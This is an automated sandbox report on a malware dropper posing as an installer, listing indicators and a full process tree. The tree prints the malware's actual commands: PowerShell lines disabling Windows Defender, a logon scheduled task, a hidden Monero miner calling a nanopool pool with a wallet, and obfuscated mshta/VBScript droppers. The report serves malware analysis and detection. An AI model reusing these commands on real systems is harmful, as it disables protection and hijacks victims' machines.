Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1284 Process not Found 2552 BnbpIxC5RaMUqdV08_JMLpxz.exe 2552 BnbpIxC5RaMUqdV08_JMLpxz.exe 1284 Process not Found 2552 BnbpIxC5RaMUqdV08_JMLpxz.exe 1284 Process not Found 2552 BnbpIxC5RaMUqdV08_JMLpxz.exe 1284 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
pid Process 1284 Process not Found 552 WerFault.exe 2856 WerFault.exe 2256 WerFault.exe 2480 WerFault.exe 2384 WerFault.exe 3784 WerFault.exe 396 WerFault.exe 3300 Sun039750b00c.exe -
Suspicious behavior: MapViewOfSection 14 IoCs
pid Process 568 Sun0324aba28588c0.exe 1340 rubjrie 2576 rubjrie 2324 rubjrie 2136 rubjrie 3220 rubjrie 3676 rubjrie 3884 rubjrie 3760 rubjrie 1132 rubjrie 1076 rubjrie 2856 rubjrie 2688 rubjrie 4000 rubjrie -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeCreateTokenPrivilege 856 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 856 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 856 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 856 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 856 Sun03d477f1a31.exe Token: SeTcbPrivilege 856 Sun03d477f1a31.exe Token: SeSecurityPrivilege 856 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 856 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 856 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 856 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 856 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 856 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 856 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 856 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 856 Sun03d477f1a31.exe Token: SeBackupPrivilege 856 Sun03d477f1a31.exe Token: SeRestorePrivilege 856 Sun03d477f1a31.exe Token: SeShutdownPrivilege 856 Sun03d477f1a31.exe Token: SeDebugPrivilege 856 Sun03d477f1a31.exe Token: SeAuditPrivilege 856 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 856 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 856 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 856 Sun03d477f1a31.exe Token: SeUndockPrivilege 856 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 856 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 856 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 856 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 856 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 856 Sun03d477f1a31.exe Token: 31 856 Sun03d477f1a31.exe Token: 32 856 Sun03d477f1a31.exe Token: 33 856 Sun03d477f1a31.exe Token: 34 856 Sun03d477f1a31.exe Token: 35 856 Sun03d477f1a31.exe Token: SeDebugPrivilege 1584 Sun03ea09aa5c9686e5.exe Token: SeDebugPrivilege 268 Sun0328255c4bce6fb.exe Token: SeDebugPrivilege 2624 taskkill.exe Token: SeDebugPrivilege 2660 taskkill.exe Token: SeDebugPrivilege 552 WerFault.exe Token: SeDebugPrivilege 2856 WerFault.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2256 WerFault.exe Token: SeDebugPrivilege 692 DownFlSetup110.exe Token: SeDebugPrivilege 2632 4.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2664 5.exe Token: SeDebugPrivilege 2144 Sun03f0dc4460bc9.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2904 6.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2480 WerFault.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2132 3793266.exe Token: SeDebugPrivilege 932 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 1548 taskkill.exe Token: SeDebugPrivilege 2720 4691549.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 1248 Sun03f5d51697d04.tmp 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 1692 wrote to memory of 2028 1692 setup_x86_x64_install.exe 28 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 2028 wrote to memory of 680 2028 setup_installer.exe 29 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1556 680 setup_install.exe 31 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 680 wrote to memory of 1560 680 setup_install.exe 32 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1560 wrote to memory of 1300 1560 cmd.exe 34 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 1556 wrote to memory of 1072 1556 cmd.exe 33 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1852 680 setup_install.exe 35 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1832 680 setup_install.exe 36 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 1828 680 setup_install.exe 37 PID 680 wrote to memory of 112 680 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe4⤵
- Loads dropped DLL
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03d477f1a31.exeSun03d477f1a31.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone4⤵
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exe" & exit6⤵PID:2592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun033e271e0ce96c08.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe4⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun039750b00c.exeSun039750b00c.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe4⤵
- Loads dropped DLL
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\mk.exe"C:\Users\Admin\AppData\Local\Temp\mk.exe"7⤵
- Executes dropped EXE
PID:2428 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2428 -s 11728⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:396
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe4⤵
- Loads dropped DLL
PID:712 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 8006⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe4⤵
- Loads dropped DLL
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exeSun0397381f1f458e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1472
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe4⤵
- Loads dropped DLL
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038aa349e3318e.exeSun038aa349e3318e.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1728 -
C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe"C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe"6⤵
- Executes dropped EXE
PID:2784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 15166⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe4⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:268 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:3152
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3936
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:3980
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2608
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Executes dropped EXE
PID:3312 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
PID:3484 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:3424 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:3916
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:3492
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Users\Admin\AppData\Roaming\3793266.exe"C:\Users\Admin\AppData\Roaming\3793266.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Users\Admin\AppData\Roaming\4691549.exe"C:\Users\Admin\AppData\Roaming\4691549.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Users\Admin\AppData\Roaming\8709834.exe"C:\Users\Admin\AppData\Roaming\8709834.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2220
-
-
C:\Users\Admin\AppData\Roaming\5717225.exe"C:\Users\Admin\AppData\Roaming\5717225.exe"8⤵
- Executes dropped EXE
PID:2952 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\5717225.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\5717225.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )9⤵PID:1900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\5717225.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\5717225.exe") do taskkill -iM "%~nxT" -f10⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq11⤵
- Executes dropped EXE
PID:1720 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )12⤵PID:3320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f13⤵PID:3524
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))12⤵
- Modifies Internet Explorer settings
PID:3632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *13⤵PID:3688
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"14⤵PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "14⤵PID:3720
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s ..\WAvZq~GT.C /u14⤵PID:3748
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "5717225.exe" -f11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\6391113.exe"C:\Users\Admin\AppData\Roaming\6391113.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2648 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
PID:2068
-
-
-
C:\Users\Admin\AppData\Roaming\3606297.exe"C:\Users\Admin\AppData\Roaming\3606297.exe"8⤵
- Executes dropped EXE
PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:1076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 13688⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2632 -s 14088⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:1636 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:1876
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:3336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:3532
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3872
-
